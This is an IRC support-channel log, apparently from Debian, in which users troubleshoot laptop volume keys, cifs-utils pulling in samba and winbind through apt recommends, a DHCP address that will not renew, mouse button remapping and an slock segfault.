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2986[18:02:00] <somiaj> maybe it only adjusts headphone volume?
Have you poked around your firmware for settings...
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2987[18:02:25] <otyugh_II> didn't checked that
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2988[18:02:33] <otyugh_II> quite twisted if this is that :O
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2989[18:02:52] <somiaj> you have pulse running
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2990[18:02:57] <otyugh_II> maybe I'll just put a sticker on
another keys and just bind the damn stuff
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2992[18:02:59] <otyugh_II> yes
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2994[18:03:05] <somiaj> could pulse be looking for these, though
you would think it would look for mute too
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2995[18:03:22] <otyugh_II> it does work for mute only
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2996[18:03:23] <somiaj> anyways, just wild guesses, on my systems
I have not seen an issue not seeing the volume up/down keycodes in
xev
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2999[18:03:41] <somiaj> but I don't use pulse or antying I
could think of that would be trying to get in the way looking for
those events.
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3000[18:03:58] <otyugh_II> awshit. Why me x)
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3001[18:04:19] <somiaj> you didn't know it, but you bought a
puzzle wrapped in a laptop case
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3002[18:04:32] <otyugh_II> :D
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3005[18:05:08] <otyugh_II> I may have not found the solution, but
I got the moral now ~
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3006[18:05:10] <somiaj> maybe it is some feature of plug-n-play
os that some bios have a setting to turn on/off
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3007[18:05:24] <otyugh_II> he. Great point
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3008[18:05:49] <somiaj> though again I woudl assume if that was
the case, mute would have been used too
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3009[18:05:54] <somiaj> anyways best of luck
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3043[18:16:48] <Gabs5807> Hello, when i install cifs-utils apt
also install samba and winbind. After installation i can remove
samba and winbind without cifs-utils is beening removed. How can i
permit the installation of samba and winbind? It seems there are no
dependencies from cifs-utils to samba and winbind. There is only
'Suggests: smbclient' and 'Recommends: winbind'
..
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3045[18:19:08] <zykotick9> Gabs5807: perhaps others undrestand,
but i don't personally follow your question?
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3058[18:22:52] <Gabs5807> zykotick9: Sorry if i'm not clear.
When i install cif-utils with 'apt-get install
cifs-utils', samba and winbind are also installed
automatically. But samba and winbind a not at the Depends list of
cifs-utils.
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3059[18:23:14] <Gabs5807> They are only 'Suggests:
smbclient' and 'Recommends: winbind'.
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3060[18:23:28] <zykotick9> Gabs5807: suggests and recommends are
similar to depends... but can be disabled if you don't want
them...
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3064[18:24:16] <Gabs5807> zykotick9: how can i do it?
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3066[18:24:43] <Gabs5807> Is there an option for apt?
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3072[18:25:29] <zykotick9> Gabs5807: try
"--no-install-recommends"
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3074[18:25:34] <dwarfmut> guys... thinkpad x220i its a good
laptop?
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3075[18:25:35] <Gabs5807> And the second question is, how can i
set this option at preseed?
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3077[18:26:42] <zykotick9> Gabs5807: re: preseed <- i
personally have NO idea... not something i've ever played with.
best of luck.
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3084[18:28:37] <zykotick9> dwarfmut: yellow its a good colour?
<- both our questions are subject to opinion, and thus not great
questions
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3087[18:29:10] <Gabs5807> zykotick9: Many thanks apt option was a
goot hint :-). I search for the preseed elsewhere. Otherwise i try
to configure APT::Install-Recommends apt apt.conf at installation ..
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3090[18:30:28] <zykotick9> Gabs5807: be VERY careful using the
APT::Iinstall-Recommends in apt.conf! is this a server build? most
packages "expect" recommends to be installed. NOTE:
i'm an idiot and run without recommnends and suggests, but i
keep a very minimal system (most people wouldn't like it)
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3097[18:32:40] <hmuller> anyone familiar with a document that
describes the rationale for package inclusion for minbase and base
using debootstrap?
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3098[18:33:17] <Gabs5807> zykotick9: no. no server. it's for
client installation (which dynamic IPs). The should not have server
services like samba installed. But vor mounting smb file systems
they need mount.cifs ..
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3099[18:33:20] <somiaj> by design recommended packages should be
installed, but opinions differ on if a package should be recommended
or suggetsed in various cases, I would look at them as a case per
case basis if needed.
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3105[18:35:26] <zykotick9> Gabs5807: i wouldn't recommend
disabling recommends if this is for clients! ymmv
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3106[18:35:44] <zykotick9> ^ system wide i mean
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3107[18:35:45] <dwarfmut> x201i its a good laptop?
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3110[18:36:30] <somiaj> Gabs5807: what recommends are you running
into, I don't see smbclient or cifs-utils recommending the
samba server
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3117[18:39:06] <somiaj> ahh I see, in jessie winbind is a
recommended package which depends on samba, but in stretch it is
suggested
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3127[18:43:03] <Gabs5807> somiaj: apt-cache depends cifs-utils
shows 'Recommends: winbind'. And apt-cache depends winbind
shows 'Depends: samba' ..
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3135[18:45:49] <Gabs5807> somiaj: For me this make no sense.
mount.cifs is for clients and samba for server. But may be other
people have an other view on this ;-).
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3137[18:46:59] <zykotick9> Gabs5807: somiaj explained in the line
above your two last posts, that this is the case in jessie but not
stretch... so it appears someone else agrees with you ;)
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3227[19:25:57] <spacebug^> I changed my router to give my network
card another IP using DHCP but I'm not getting the new IP even
if I disable and enable the the network through network manager.
Also "dhclient -r" does not do the trick
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3286[19:49:28] <configuringmouse> Hello. I'm trying to remap
my mouse thumb button. I've tried xte, xbindkeys, imwheel, and
a few more. They all bind the mouse thumb to a key correctly, but
there is an issue: when I am holding another mouse button (ie left
click) and then I press the thumb button, then the thumb button will
do nothing.
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3287[19:49:41] <configuringmouse> I tested it with xev, having
thumb_1 remapped to SPACE key, and while pressing thumb in fact
printed space, pressing thumb while holding left click printed
button 8 (default mouse thumb button), so S O M E H O W the sole act
of holding a mouse button DENIES EVERY REMAP TOOL AVAILABLE FOR
LINUX.
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3289[19:50:01] <configuringmouse> I've googled for hours and
there are some people who had my same issue, but no one provided an
answer!!!!! i'm going crazy. I've been 4 hours on this. I
just want my mouse thumb to behave as a keyboard key, why is it so
complicated?
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3323[19:57:39] <ryouma> turning off my monitor segfaults slock.
any clues? slock[14042]: segfault at 0 ip 00007f0a6840fc35 sp
00007ffcdddea7e0 error 4 in libnss_compat-2.19.so[7f0a6840b000+7000]
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3355[20:09:26] <raynold[here]> ahh it's a wonderful day
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3357[20:10:17] <shewp> sure is
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